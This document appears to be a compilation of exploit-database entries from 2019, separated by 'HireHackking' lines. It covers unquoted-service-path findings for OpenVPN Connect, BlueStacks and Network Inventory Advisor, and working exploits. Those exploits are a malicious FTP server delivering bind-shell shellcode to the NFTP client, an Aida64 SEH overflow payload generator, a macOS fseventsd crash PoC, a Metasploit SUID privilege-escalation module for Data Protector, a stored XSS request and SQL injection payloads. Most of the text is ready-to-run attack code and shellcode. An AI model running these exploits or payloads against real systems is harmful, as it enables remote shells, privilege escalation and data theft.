# Tested Version: 3.0.0.(272)
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path: 

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """

OpenVPN Agent agent_ovpnconnect		agent_ovpnconnect	C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe	Auto

# Service info:

C:\>sc qc agent_ovpnconnect
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: agent_ovpnconnect
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OpenVPN Agent agent_ovpnconnect
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Ayukov NFTP client 1.71 -  'SYST' Buffer Overflow
# Date: 2019-11-03
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
# Version: 1.71
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
# Steps to reproduce:
# Run the server with the valid Windows version
# Connect the client to the malicious server
# bind shell on port 5150

#!/usr/bin/env python2
import os, sys, socket

NARGS = len(sys.argv)

# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# 7C923A95   FFD6  CALL ESI  	# Windows XP Pro SP3; ntdll.dll
# 7C927543   FFD6  CALL ESI		# Windows XP Pro SP2; ntdll.dll
# 77E641C7   FFE6  JMP ESI		# Windows XP Pro SP1; kernel32.dll
# 77E667F3   FFE6  JMP ESI		# Windows XP Pro SP0: kernel32.dll
tourRETs = {
	"XPProSP3": "\x95\x3A\x92\x7c",
	"XPProSP2": "\x43\x75\x92\x7C",
	"XPProSP1": "\xc7\x41\xe6\x77",
	"XPProSP0": "\xf3\x67\xe6\x77"
}


if not NARGS > 1:
	print("USAGE: %s version" % sys.argv[0])
	print("[.] version must be in:")
	for item in tourRETs:
		print("\t%s" % item)
	sys.exit(1)


# sploit = "A"*5000  # crash!  in SYST cmd, 41414141 in EIP and EBP
# ESP and ESI both pointers to somewhere in the As
#  If I increase the overflow string to 10000, the area ESP points to at crash
#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
# sploit = "A"*10000
# sploit = sys.argv[1]  # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
# `locate pattern_offset.rb |head -n 1` 46326846 10000  # 4116
sploit = "A"*4116

# Add the return address
try:
	sploit +=  tourRETs[sys.argv[1]]
except KeyError, x:
	print("[!] Version %s: not a valid version!  Possibly bad capitalization" % str(x))
	sys.exit(1)

sploit += ("\x90"*12)  # original calcs based on RET*4... oops. realign.

# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc  # 0x69D (1693); ESP-ESI
sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs


# badchars = "\x00\x0a\x0d"
# locate EIP and align ESP to a close future 4 and 16 byte boundary
NOTES = """\
$-37     > D9EE             FLDZ
$-35     > D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
$-31     > 59               POP ECX
$-30     > 80C1 09          ADD CL,9
$-2D     > 80C1 04          ADD CL,4
$-2A     > 80C1 2A          ADD CL,2A
$-27     > 80C5 01          ADD CH,1
$-24     > 51               PUSH ECX
$-23     > 5C               POP ESP
"""
sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
sploit += "\x90" * 0x22  # ESP = EIP
sploit += "\x90" * 20  # sled for shikata_ga_nai unpack

# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process 
# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
sploit += (
"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
) # 355
sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)


cases = {
	"USER": "331 user OK. Pass required",
	"PASS": "230 OK, current directory is /",
	# "SYST": "215 UNIX Type: L8",

	"SYST": sploit,		# CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP

	"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
	"SITE UMASK": "500 SITE UMASK is an unknown extension",
	"CWD": "250 OK, current directory whatever you think it is",
	"PORT": "200 PORT command successful",
	"PASV": "227 Entering PASV mode",
	"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
}


sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sx.bind(("192.168.56.181",21))
sx.listen(5)
print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
cx,addr = sx.accept()
print("[!] Connection received from %s" % str(addr))
cx.send("220 HostileFTPd v0.0 alpha !\r\n")
notified = 0
while True:	
	req = cx.recv(1024)
	for key, resp in cases.items():
		if key in req:
			cx.send(resp + "\r\n")
		if "SITE UMASK" in req and notified == 0:
			print("[!]  Buffer sent.  Bind shell on client's port 5150?")
			notified = 1
		if "PASV" in req:
			justpause = raw_input("[.] PASV received.  Pausing recv buffer")


NOTES="""\
### followed TCP stream in normal client connect to ftp server
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 13:47. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER bozo
331 User bozo OK. Password required
PASS theclown
230-User bozo has group access to:  1003      
230 OK. Current directory is /
SYST
215 UNIX Type: L8
TYPE I
200 TYPE is now 8-bit binary
SITE UMASK 022
500 SITE UMASK is an unknown extension
CWD /
250 OK. Current directory is /
PASV
227 Entering Passive Mode (192,168,56,181,183,29)
LIST -a
150 Accepted data connection
226-ASCII
226-Options: -a -l 
226 3 matches total
"""
HireHackking 
# Exploit Title: Aida64 6.10.5200 - Buffer Overflow (SEH)
# Date: 2019-10-28
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage: https://www.aida64.com
# Software Link: https://www.aida64.com/downloads/OTAwMmVmNTE=
# Version: AIDA64 Enginner 6.10.5200
# Tested on: Windows 7 Home Basic SP1
# CVE : N/A

# Step
1) File -> Preferences -> Logging -> Log sensor readings to CSV log file
2) Paste payload from "aida64.txt" -> Apply
3) File -> Exit

# Exploit Code
#! Python

import struct

# shell code
buf =  ""
buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"
buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"
buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"
buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"
buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"
buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"
buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"
buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"
buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"
buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"
buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"
buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"
buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"
buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"
buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"
buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"
buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"
buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"
buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"
buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"
buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"
buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"
buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"
buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"
buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"
buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"
buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"
buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"
buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"
buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"
buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"
buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"
buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"
buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"
buf += "\x76\x74\x33\x79\x76\x35\x41\x41"

# Exploit Payload
sehNext = struct.pack('<L',0x909010EB) # SHORT JMP
sehHandler = struct.pack('<L',0x0120c8b6) # POP POP RET

payload = 'A' * (1115 - 4)  + sehNext + sehHandler + "\x90" * 16 + buf +"B"*1000

f = open("aida64.txt", "wb")
f.write(payload)
f.close()
HireHackking 
# Exploit Title: Apple macOS 10.15.1 - Denial of Service (PoC)
# Date: 2019-11-02
# Exploit Author: 08Tc3wBB
# Vendor Homepage: Apple
# Software Link:
# Version: Apple macOS < 10.15.1 / iOS < 13.2
# Tested on: Tested on macOS 10.14.6 and iOS 12.4.1
# CVE : N/A
# Type : DOS
# https://support.apple.com/en-us/HT210721

----- Execution file path:
  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd

fseventsd running as root and unsandboxed on both iOS and macOS, and accessible from within the Application sandbox.

----- Analysis

Env: macOS 10.14.6
I named following pseudocode functions to help you understand the execution flow.

void __fastcall routine_1(mach_msg_header_t *msg, mach_msg_header_t *reply) // 0x100001285
{
  ...
  v9 = implementation_register_rpc(
         msg->msgh_local_port,
         msg[1].msgh_size,
         msg[4].msgh_reserved,               
         (unsigned int)msg[4].msgh_id,
         *(_QWORD *)&msg[1].msgh_reserved,      // input_mem1
         msg[2].msgh_size >> 2,                 // input_mem1_len
         *(_QWORD *)&msg[2].msgh_remote_port,   // input_mem2
         msg[2].msgh_id,                        // input_mem2_len
         msg[5].msgh_remote_port,
         *(_QWORD *)&msg[3].msgh_bits,          // input_mem3
         msg[3].msgh_local_port >> 2,           // input_mem3_len
         *(_QWORD *)&msg[3].msgh_reserved,      // input_mem4
         msg[4].msgh_size);                     // input_mem4_len
  ...
}
routine_1 will be executed when user send mach_msg to Mach Service "com.apple.FSEvents" with id 0x101D0

And routine_1 internally invokes a function called fsevent_add_client to process data included in input_mem1/input_mem2

I marked five places with: (1) (2) (3) (4) (5)
These are the essential points cause this vulnerability.

void *fsevent_add_client(...)
{
  ...
  v25 = malloc(8LL * input_mem1_len); // (1) Allocate a new buffer with input_mem1_len, didn't initializing its content.
  *(_QWORD *)(eventobj + 136) = v25; // Subsequently insert that new buffer into (eventobj + 136)
  ...

  v20 = ... // v20 point to an array of strings that was created based on user input

  // The following process is doing recursive parsing to v20

  index = 0LL;
  while ( 1 )
  {
    v26 = *(const char **)(v20 + 8 * index);
   
    ...

    v28 = strstr(*(const char **)(v20 + 8 * index), "/.docid");
    v27 = v26;
    if ( !v28 ) // (2) If input string doesn't contain "/.docid", stop further parse, go straight to strdup
      goto LABEL_15;

    if ( strcmp(v28, "/.docid") ) // (3) If an input string doesn't exactly match "/.docid", goto LABEL_16
      goto LABEL_16;

    *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(".docid");

LABEL_17:
    if ( ++index >= input_mem1_len )
      goto LABEL_21;
  }

  v27 = *(const char **)(v20 + 8 * index);
LABEL_15:
  *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(v27);


LABEL_16:
  if ( *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) )
    goto LABEL_17; // (4) So far the new buffer has never been initialized, but if it contain any wild value, it will goto LABEL_17, which program will retain that wild value and go on to parse next input_string
  ...


  // (5) Since all values saved in the new buffer supposed to be the return value of strdup, they will all be free'd later on. So if spray works successfully, the attacker can now has the ability to call free() on any address, further develop it to modify existing memory data.
}

However there is a catch, fseventsd only allow input_mem1_len be 1 unless the requested proc has root privilege, led to the size of uninitialized buffer can only be 8, such small size caused it very volatile, hard to apply desired spray work unless discover something else to assist. Or exploit another system proc (sandboxed it's okay), and borrow their root credential to send the exploit msg.

----- PoC

// clang poc.c -framework CoreFoundation -o poc

#include <stdio.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <bootstrap.h>

mach_port_t server_port = 0;
mach_port_t get_server_port(){
    if(server_port)
        return server_port;
    bootstrap_look_up(bootstrap_port, "com.apple.FSEvents", &server_port);
    return server_port;
}

int trigger_bug = 0;
int has_reach_limit = 0;
uint32_t call_routine_1(){
   
    struct SEND_Msg{
        mach_msg_header_t Head;
        mach_msg_body_t msgh_body;
        mach_msg_port_descriptor_t port;
        mach_msg_ool_descriptor_t mem1;
        mach_msg_ool_descriptor_t mem2;
        mach_msg_ool_descriptor_t mem3;
        mach_msg_ool_descriptor_t mem4;
        // Offset to here : +104
       
        uint64_t unused_field1;
        uint32_t input_num1; // +112
        uint32_t input_num2; // +116
        uint64_t len_auth1; // +120 length of mem1/mem2
        uint32_t input_num3; // +128
        uint64_t len_auth2; // +132 length of mem3/mem4
       
        char unused_field[20];
    };
   
    struct RECV_Msg{
        mach_msg_header_t Head; // Size: 24
        mach_msg_body_t msgh_body;
        mach_msg_port_descriptor_t port;
        uint64_t NDR_record;
    };
   
    struct SEND_Msg *msg = malloc(0x100);
    bzero(msg, 0x100);
   
    msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND);
    msg->Head.msgh_size = 160;
    int kkk = get_server_port();
    msg->Head.msgh_remote_port = kkk;
    msg->Head.msgh_local_port = mig_get_reply_port();
    msg->Head.msgh_id = 0x101D0;
    msg->msgh_body.msgh_descriptor_count = 5;
   
    msg->port.type = MACH_MSG_PORT_DESCRIPTOR;
    msg->mem1.deallocate = false;
    msg->mem1.copy = MACH_MSG_VIRTUAL_COPY;
    msg->mem1.type = MACH_MSG_OOL_DESCRIPTOR;
    memcpy(&msg->mem2, &msg->mem1, sizeof(msg->mem1));
    memcpy(&msg->mem3, &msg->mem1, sizeof(msg->mem1));
    memcpy(&msg->mem4, &msg->mem1, sizeof(msg->mem1));
   
    mach_port_t port1=0;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port1);
   
    msg->port.name = port1;
    msg->port.disposition = MACH_MSG_TYPE_MAKE_SEND;
   
    uint64_t empty_data = 0;
    if(trigger_bug){
       
        msg->input_num1 = 5;
       
        msg->mem1.address = &empty_data;
        msg->mem1.size = 4;
        msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
       
        msg->mem2.address = "/.docid1";
        msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
    }
    else{
        msg->input_num1 = 1;
       
        msg->mem1.address = &empty_data;
        msg->mem1.size = 4;
        msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
       
        msg->mem2.address = "/.dacid1";
        msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
    }
   
    msg->mem3.address = 0;
    msg->mem3.size = 0;
    msg->input_num3 = msg->mem3.size >> 2; // input_mem3_len_auth
   
    msg->mem4.address = 0;
    msg->mem4.size = 0;
   
    msg->len_auth1 = ((uint64_t)msg->mem2.size << 32) | (msg->mem1.size >> 2);
    msg->len_auth2 = ((uint64_t)msg->mem4.size << 32) | (msg->mem3.size >> 2);
   
    mach_msg((mach_msg_header_t*)msg, MACH_SEND_MSG|(trigger_bug?0:MACH_RCV_MSG), msg->Head.msgh_size, 0x100, msg->Head.msgh_local_port, 0, 0);
   
    int32_t errCode = *(int32_t*)(((char*)msg) + 0x20);
    if(errCode == -21){
        has_reach_limit = 1;
    }
   
    mig_dealloc_reply_port(msg->Head.msgh_local_port);
    struct RECV_Msg *recv_msg = (void*)msg;
   
    uint32_t return_port = recv_msg->port.name;
    free(msg);
   
    return return_port;
}

int main(int argc, const char * argv[]) {
  
    printf("PoC started running...\n");
   
    uint32_t aaa[1000];
    for(int i=0; i<=1000; i++){
        if(has_reach_limit){
            trigger_bug = 1;
            call_routine_1();
            break;
        }
        aaa[i] = call_routine_1();
    }
   
    printf("Finished\n");
    printf("Check crash file beneath /Library/Logs/DiagnosticReports/\n");
   
    return 0;
}
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
      'Description'    => %q{
        This module exploits the trusted `$PATH` environment
        variable of the SUID binary `omniresolve` in
        Micro Focus (HPE) Data Protector A.10.40 and prior.

        The `omniresolve` executable calls the `oracleasm` binary using
        a relative path and the trusted environment `$PATH`, which allows
        an attacker to execute a custom binary with `root` privileges.

        This module has been successfully tested on:
        HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)

        The vulnerability has been patched in:
        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          's7u55', # Discovery and Metasploit module
        ],
      'DisclosureDate' => '2019-09-13',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        =>
        [
          [
            'Micro Focus (HPE) Data Protector <= 10.40 build 118',
            upper_version: Gem::Version.new('10.40')
          ]
        ],
      'DefaultOptions' =>
        {
          'PrependSetgid' => true,
          'PrependSetuid' => true
        },
      'References'     =>
        [
          [ 'CVE', '2019-11660' ],
          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
        ]
    ))

    register_options(
      [
        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def suid_bin_path
    datastore['SUID_PATH'].to_s
  end

  def check
    unless setuid? suid_bin_path
      vprint_error("#{suid_bin_path} executable is not setuid")
      return CheckCode::Safe
    end

    info = cmd_exec("#{suid_bin_path} -ver").to_s
    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
      version = '%.2f' % $1.to_f
      build = $3.to_i
      vprint_status("omniresolve version #{version} build #{build}")

      unless Gem::Version.new(version) < target[:upper_version] ||
             (Gem::Version.new(version) == target[:upper_version] && build <= 118)
        return CheckCode::Safe
      end

      return CheckCode::Appears
    end

    vprint_error("Could not parse omniresolve -ver output")
    CheckCode::Detected
  end

  def exploit
    if check == CheckCode::Safe
      unless datastore['ForceExploit']
        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
      end
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    payload_path = File.join(base_dir, 'oracleasm')
    register_file_for_cleanup(payload_path)
    write_file(payload_path, generate_payload_exe)
    chmod(payload_path)

    trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
    register_file_for_cleanup(trigger_path)
    write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
  end
end
HireHackking 
# Exploit Title: Blue Stacks App Player 2.4.44.62.57 - "BstHdLogRotatorSvc" Unquote Service Path
# Date: 2019-11-09
# Exploit Author: Diego Armando Buztamante Rico
# Vendor Homepage: www.bluestacks.com
# Software Link: www.bluestacks.com
# Version: 2.4.44.62.57
# Tested on: Windows 8.1 Pro
# CVE: NA

#Description
#Blue Stacks is an application which allows to run mobile apps on Windows and Mac. 
#The service BstHdLogRotatorSvc is use to allow HD displays of Blue Stacks app.
#The service suffers from an unquoted path.

#PoC using CMD
#Command to discover the unquoted path:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"

#As a result we have

BlueStacks Log Rotator Service       BstHdLogRotatorSvc       C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe        Auto

#We use the name of service to get its information using next command.

C:\Users\user>sc qc BstHdLogRotatorSvc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: BstHdLogRotatorSvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : BlueStacks Log Rotator Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
HireHackking 
# Exploit Title: thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
# Software Link: https://github.com/thrsrossi/Millhouse-Project.git
# Version: 1.414
# Tested on: CentOS 7
# CVE: N/A

# PoC for this XSS attack

POST /includes/add_comment_sql.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/views/single_post.php?post_id=53
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Cookie: PHPSESSID=0sqr9kui308rq66ol1uu5olb94; submenu1=block; showips=10; showurls=10; showreferers=10
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

content=%3Cscript%3Ealert%28%22TEST%22%29%3B%3C%2Fscript%3E
HireHackking 
# Exploit Title: thejshen Globitek CMS 1.4 - 'id' SQL Injection
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/thejshen/contentManagementSystem
# Software Link: https://github.com/thejshen/contentManagementSystem.git
# Version: 1.4
# Tested on: CentOS 7
# CVE: N/A

# The GET request for content ID is vulnerable to Union, Bolean and Time-Based Blind SQL injection

# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Vector: AND [INFERENCE]

Payload: id=4' AND 5143=5143-- OWXt
    
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG
    
# Type: UNION query
# Title: Generic UNION query (NULL) - 5 columns
# Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]    
    
Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh
HireHackking 
# Exploit Title: Network Inventory Advisor 5.0.26.0 - 'niaservice' Unquoted Service Path
# Date: 2019-11-04
# Exploit Author: Samuel DiazL
# Vendor Homepage: https://www.network-inventory-advisor.com/
# Software Link: https://www.network-inventory-advisor.com/download.html
# Version: 5.0.26.0
# Tested on: Microsoft Windows 10 Enterprise x64 ESP
# CVE: N/A

# Description:
# Network Inventory Advisor installs niaservice as a service with an unquoted service path

C:\Users\SD502812>sc qc niaservice
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: niaservice
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ClearApps\Network Inventory Advisor\niaservice.exe
